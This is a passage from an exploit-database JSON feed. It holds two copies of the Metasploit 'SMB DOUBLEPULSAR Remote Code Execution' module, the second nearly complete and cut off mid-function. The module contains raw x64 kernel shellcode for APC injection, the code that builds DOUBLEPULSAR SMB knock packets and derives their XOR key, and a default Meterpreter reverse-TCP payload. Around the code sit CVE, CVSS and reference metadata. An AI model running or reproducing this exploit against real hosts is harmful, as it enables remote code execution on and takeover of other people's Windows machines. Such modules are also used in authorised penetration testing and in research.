fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-04] #"}, "lastseen": "2021-10-04T06:21:04", "differentElements": ["sourceData"], "edition": 33}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "3334c16badce24728525e6dcbd0b7537", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-05T02:14:49", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27802", "1337DAY-ID-33313"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:42030", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96707", "SMNTC-96703", "SMNTC-96705", "SMNTC-96706", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-05T02:14:49", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-05T02:14:49", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = 